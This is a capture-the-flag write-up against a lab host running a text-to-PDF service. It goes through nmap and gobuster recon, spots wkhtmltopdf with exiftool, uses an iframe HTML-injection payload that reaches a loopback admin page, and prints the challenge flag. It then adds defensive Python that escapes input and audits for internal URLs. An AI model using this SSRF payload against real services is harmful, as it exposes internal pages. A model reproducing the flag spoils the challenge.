Introduction
These are my notes for future reference.
What is the flag?
First, nmap.
$ nmap 10.10.222.148
Starting Nmap 7.60 ( https://nmap.org ) at 2024-08-03 01:21 BST
Nmap scan report for ip-10-10-222-148.eu-west-1.compute.internal (10.10.222.148)
Host is up (0.0014s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5000/tcp open upnp
MAC Address: 02:F0:D2:3F:BB:8B (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1.96 seconds
Three open ports can be confirmed. Visiting ports 80 and 5000 shows a page that takes text input and converts it to a PDF.
Search for hidden directories with gobuster.
$ gobuster dir -u http://10.10.222.148 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.222.148
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2024/08/03 01:23:51 Starting gobuster
===============================================================
/admin (Status: 403)
===============================================================
2024/08/03 01:23:54 Finished
===============================================================
Also check port 5000.
$ gobuster dir -u http://10.10.222.148:5000 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.222.148:5000
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2024/08/03 01:27:24 Starting gobuster
===============================================================
/admin (Status: 403)
===============================================================
2024/08/03 01:27:27 Finished
===============================================================
Both had an admin page, but it could not be viewed because of missing permissions (403).
I got stuck here, but let's generate a PDF and analyze it with exiftool.
$ exiftool document.pdf
ExifTool Version Number : 10.80
File Name : document.pdf
Directory : .
File Size : 6.6 kB
File Modification Date/Time : 2024:08:03 01:35:27+01:00
File Access Date/Time : 2024:08:03 01:35:27+01:00
File Inode Change Date/Time : 2024:08:03 01:35:27+01:00
File Permissions : rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.4
Linearized : No
Title :
Creator : wkhtmltopdf 0.12.5
Producer : Qt 4.8.7
Create Date : 2024:08:03 00:25:00Z
Page Count : 1
The Creator field says wkhtmltopdf, so let's look it up.
It seems to be a program that converts HTML into PDF.
In that case, HTML injection looks usable.
If I put an iframe that loads the admin page via the loopback address, wouldn't that get around the permission problem??
<iframe src="http://127.0.0.1:5000/admin"></iframe>
Bingo!!
The flag was there too.
flag{1f4a2b6ffeaf4707c43885d704eaee4b}
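From the defender's side, the root cause above is that user text is interpolated into the HTML handed to wkhtmltopdf without escaping, so markup in the input is rendered, and the renderer (which runs on the server) fetches whatever the markup references, including loopback URLs. The following Python is an added example, not code from this writeup or from the target application; the template, the function names and the hypothetical "text-to-PDF" service are assumptions. It shows the vulnerable interpolation beside the escaped form, and an audit that lists every src/href the renderer would be asked to fetch and flags loopback, private-range and non-http targets before the HTML is passed to the converter.

```python
import html
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical template a text-to-PDF service might feed to wkhtmltopdf.
TEMPLATE = "<html><body><p>{body}</p></body></html>"


def build_html_vulnerable(user_text: str) -> str:
    """Interpolates the raw text: any tags the user typed are rendered as markup."""
    return TEMPLATE.format(body=user_text)


def build_html_hardened(user_text: str) -> str:
    """Escapes the text first, so '<iframe ...>' becomes literal characters."""
    return TEMPLATE.format(body=html.escape(user_text, quote=True))


class _RefCollector(HTMLParser):
    """Collects every (tag, url) pair the renderer would try to fetch."""

    def __init__(self) -> None:
        super().__init__()
        self.refs: list[tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("src", "href") and value:
                self.refs.append((tag, value))


def fetchable_refs(doc: str) -> list[tuple[str, str]]:
    """Returns all src/href values found in the HTML document."""
    parser = _RefCollector()
    parser.feed(doc)
    parser.close()
    return parser.refs


def is_internal_target(url: str) -> bool:
    """True if fetching this URL from the server would reach something it should not:
    loopback/private/link-local addresses, 'localhost', or a non-http scheme
    such as file://, which would let the renderer read local files."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return True
    host = (parsed.hostname or "").lower()
    if host == "localhost":
        return True
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        # A DNS name: in production resolve it and re-check the resulting
        # address, since a name can point at an internal IP (DNS rebinding).
        return False


def audit(doc: str) -> list[tuple[str, str]]:
    """References that should block rendering: internal or non-http targets."""
    return [(tag, url) for tag, url in fetchable_refs(doc) if is_internal_target(url)]


if __name__ == "__main__":
    # Constructed sample input: the same payload shape as in the writeup.
    payload = '<iframe src="http://127.0.0.1:5000/admin"></iframe>'
    print("vulnerable:", audit(build_html_vulnerable(payload)))
    print("hardened:  ", audit(build_html_hardened(payload)))
```

Escaping alone removes the injection for a plain-text service; the audit is the second layer for applications that legitimately accept some HTML, and it should run on the final document right before the converter is invoked, with the converter itself additionally restricted from reaching internal hosts at the network level.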